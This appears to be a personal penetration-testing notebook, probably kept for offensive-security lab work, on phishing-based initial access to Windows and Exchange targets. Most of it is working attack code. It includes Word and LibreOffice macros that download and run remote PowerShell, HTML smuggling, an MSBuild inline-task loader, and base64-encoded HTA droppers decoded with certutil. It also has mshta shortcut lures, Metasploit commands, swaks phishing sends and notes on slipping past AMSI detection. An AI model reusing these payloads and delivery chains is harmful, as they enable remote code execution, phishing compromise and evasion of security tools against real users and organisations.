Attacking Exchange servers
Initial access payloads
Sending a payload to the phished user(s) is a direct way to gain a foothold, since it will be executed on their system. There are broadly two options for delivering a payload.
-
Send a URL where a payload can be downloaded.
-
Attach the payload to the phishing email.
One significant difference (apart from how you dress it up to the user), is that any file downloaded via a browser (outside of a trusted zone) will be tainted with the “Mark of the Web” (MOTW). In a nutshell, this is a data stream that gets embedded into the file which says it was downloaded from an untrusted location. The zone data can be read with PowerShell.
gc .\test.txt -Stream Zone.IdentifierThe possible zones are:
- 0 ⇒ Local computer
- 1 ⇒ Local intranet
- 2 ⇒ Trusted sites
- 3 ⇒ Internet
- 4 ⇒ Restricted sites
Files that are emailed “internally” via a compromised Exchange mailbox are not tagged with a Zone Identifier.
VBA Macros
Check the Architecture for Sliver Payload
https://github.com/christophetd/spoofing-office-macro
You can create a macro in a Word document by going to View > Macros > Create. Change the “Macros in” field from “All active templates and documents” to “Document 1”. Give the macro a name and click Create. To force the macro to trigger automatically when the document is opened, use the name AutoOpen.
Sub MyMacro()
Dim str2 As String
str2 = "powershell.exe -noexit -ep bypass -c IEX((New-Object System.Net.WebClient).DownloadString('http://10.10.15.207/large1.ps1'))"
Shell str2, vbHide
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Sub MyMacro()
Dim str2 As String
str2 = "powershell.exe -noexit -ep bypass -c ((New-Object System.Net.WebClient).DownloadString('http://10.0.0.241/am.txt')) | IEX"
Shell str2, vbHide
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
To prepare the document for delivery, go to File > Info > Inspect Document > Inspect Document, which will bring up the Document Inspector. Click Inspect and then Remove All next to Document Properties and Personal Information. This is to prevent the username on your system being embedded in the document.
Remote Template Injection
Microsoft Word has the option of creating new documents from a template. Office has some templates pre-installed, you can make custom templates, and even download new ones. Remote Template Injection is a technique where an attacker sends a benign document to a victim, which downloads and loads a malicious template. This template may hold a macro, leading to code execution.
- Open Word on the Attacker Desktop, create a new blank document and insert your desired macro. Save this to
C:\Payloadsas a Word 97-2003 Template (*.dot) file. This is now our “malicious remote template”.
HTTP Smuggling
HTML smuggling is a technique that uses JavaScript to hide files from content filters. If you send a phishing email with a download link, the HTML may look something like:
<html>
<head>
<title>HTML Smuggling</title>
</head>
<body>
<p>This is all the user will see...</p>
<script>
function convertFromBase64(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}
var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
var data = convertFromBase64(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'test.txt';
if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
else {
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
</script>
</body>
</html> echo -en "This is a smuggled file" | base64Web exploits
Drupalgeddon2
sudo msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOSTS 10.9.15.11; set LHOST tun0; set LPORT 80; exploit"
Client Side execution
Create XML file with the code we want to execute x.xml
This we will host on our kali web server
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Using Namespace="System.IO" />
<Code Type="Fragment" Language="cs">
<![CDATA[
Console.WriteLine("Hello From Fragment");
]]>
</Code>
</Task>
</UsingTask>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
String cmd = @"(New-Object Net.WebClient).DownloadString('http://192.168.45.195/am.txt') | iex";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>Encode the xml file
base64 -w 0 x.xml > xbase64.txt
PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzE5Mi4xNjguNDUuMTk1L2FtLnR4dCcpIHwgaWV4IjsKICAgICAgICAgICAgUnVuc3BhY2UgcnMgPSBSdW5zcGFjZUZhY3RvcnkuQ3JlYXRlUnVuc3BhY2UoKTsKICAgICAgICAgICAgcnMuT3BlbigpOwogICAgICAgICAgICBQb3dlclNoZWxsIHBzID0gUG93ZXJTaGVsbC5DcmVhdGUoKTsKICAgICAgICAgICAgcHMuUnVuc3BhY2UgPSByczsKICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7CiAgICAgICAgICAgIHBzLkludm9rZSgpOwogICAgICAgICAgICBycy5DbG9zZSgpOwogICAgICAgICAgICByZXR1cm4gdHJ1ZTsKCgogICAgICAgICAgICAgICAgfQoKCiAgICAgICAgICAgIH0KCgoKCiAgICAgICAgXV0+CiAgICAgIDwvQ29kZT4KICAgIDwvVGFzaz4KICA8L1VzaW5nVGFzaz4KPC9Qcm9qZWN0Pgo=
Create an HTA File x.hta
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var re = shell.Run("powershell -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzE5Mi4xNjguNDUuMTk1L2FtLnR4dCcpIHwgaWV4IjsKICAgICAgICAgICAgUnVuc3BhY2UgcnMgPSBSdW5zcGFjZUZhY3RvcnkuQ3JlYXRlUnVuc3BhY2UoKTsKICAgICAgICAgICAgcnMuT3BlbigpOwogICAgICAgICAgICBQb3dlclNoZWxsIHBzID0gUG93ZXJTaGVsbC5DcmVhdGUoKTsKICAgICAgICAgICAgcHMuUnVuc3BhY2UgPSByczsKICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7CiAgICAgICAgICAgIHBzLkludm9rZSgpOwogICAgICAgICAgICBycy5DbG9zZSgpOwogICAgICAgICAgICByZXR1cm4gdHJ1ZTsKCgogICAgICAgICAgICAgICAgfQoKCiAgICAgICAgICAgIH0KCgoKCiAgICAgICAgXV0+CiAgICAgIDwvQ29kZT4KICAgIDwvVGFzaz4KICA8L1VzaW5nVGFzaz4KPC9Qcm9qZWN0Pgo= > c:\\windows\\temp\\enc2.txt;certutil -decode c:\\windows\\temp\\enc2.txt c:\\windows\\temp\\f.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\f.xml")
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
Create a shortcut file
C:\Windows\System32\mshta.exe http://192.168.45.195/x.hta
Send the email
swaks --to Will@tricky.com --from bad@motherfucker.com --server 192.168.181.159 --header "Subject: Test Email" --body "This is a test email." --attach /home/jay/osep/windows_10_test/x.exe.lnk
The am.txt was getting flagged so l directly used sliverPhollow64.txt.
This was also unstable so i used the amsi bypass from zeropoint security And it worked
VBA
Sliver VBA Macro
Try again in challenge 1 with new xhta
Sub MyMacro()
Dim str2 As String
str2 = "mshta.exe http://192.168.45.195/sliver.hta"
Shell str2, vbHide
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
wmic process get brief /format:"http://192.168.119.120/test.xsl"
Libreoffice
sudo msfconsole
use exploit/misc/openoffice_document_macro
set payload windows/x64/exec
set cmd "mshta.exe http://10.8.2.41/x.hta"
https://0xdf.gitlab.io/2020/02/01/htb-re.html
Change the macro as it didn’t has the command
REM ***** BASIC *****
Sub OnLoad
Dim os as string
os = GetOS
If os = "windows" OR os = "osx" OR os = "linux" Then
Exploit
end If
End Sub
Sub Exploit
Shell("cmd.exe /C ""mshta.exe http://10.8.2.41/amsi64.txt""")
End Sub
Function GetOS() as string
select case getGUIType
case 1:
GetOS = "windows"
case 3:
GetOS = "osx"
case 4:
GetOS = "linux"
end select
End Function
Function GetExtName() as string
select case GetOS
case "windows"
GetFileName = "exe"
case else
GetFileName = "bin"
end select
End Function
It worked better
REM ***** BASIC *****
Sub Main
Shell("cmd /c powershell ""iex(new-object net.webclient).downloadstring('http://10.10.14.11/amsi64.txt')""")
End Sub
https://0xdf.gitlab.io/2020/02/01/htb-re.html
Sendmail instead of swaks worked
sendemail -s job.local -f "sec <sec@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.41/" -a msf.odt
Simpler xml
abc.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Using Namespace="System.IO" />
<Code Type="Fragment" Language="cs">
<![CDATA[
Console.WriteLine("Hello From Fragment");
]]>
</Code>
</Task>
</UsingTask>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
String cmd = @"(New-Object Net.WebClient).DownloadString('http://192.168.45.195/large1.ps1') | iex";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>base64 -w 0 abc.xml > abcbase.txt
abc.hta
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var re = shell.Run("powershell -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzE5Mi4xNjguNDUuMTk1L2xhcmdlMS5wczEnKSB8IGlleCI7CiAgICAgICAgICAgIFJ1bnNwYWNlIHJzID0gUnVuc3BhY2VGYWN0b3J5LkNyZWF0ZVJ1bnNwYWNlKCk7CiAgICAgICAgICAgIHJzLk9wZW4oKTsKICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7CiAgICAgICAgICAgIHBzLlJ1bnNwYWNlID0gcnM7CiAgICAgICAgICAgIHBzLkFkZFNjcmlwdChjbWQpOwogICAgICAgICAgICBwcy5JbnZva2UoKTsKICAgICAgICAgICAgcnMuQ2xvc2UoKTsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CgoKICAgICAgICAgICAgICAgIH0KCgogICAgICAgICAgICB9CgoKCgogICAgICAgIF1dPgogICAgICA8L0NvZGU+CiAgICA8L1Rhc2s+CiAgPC9Vc2luZ1Rhc2s+CjwvUHJvamVjdD4K > c:\\windows\\temp\\enc3.txt;certutil -decode c:\\windows\\temp\\enc3.txt c:\\windows\\temp\\d.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\d.xml")
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
Change the ip and port in large1.ps1
nc -lvnp 1234
Create new shortcut
Send email
waks --to Will@tricky.com --from bad@motherfucker.com --server 192.168.181.159 --header "Subject: Test Email" --body "This is a test email." --attach /home/jay/osep/windows_10_test/abc.hta.lnk
Sliver
with new am.txt not working as expected
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/am.txt') | IEX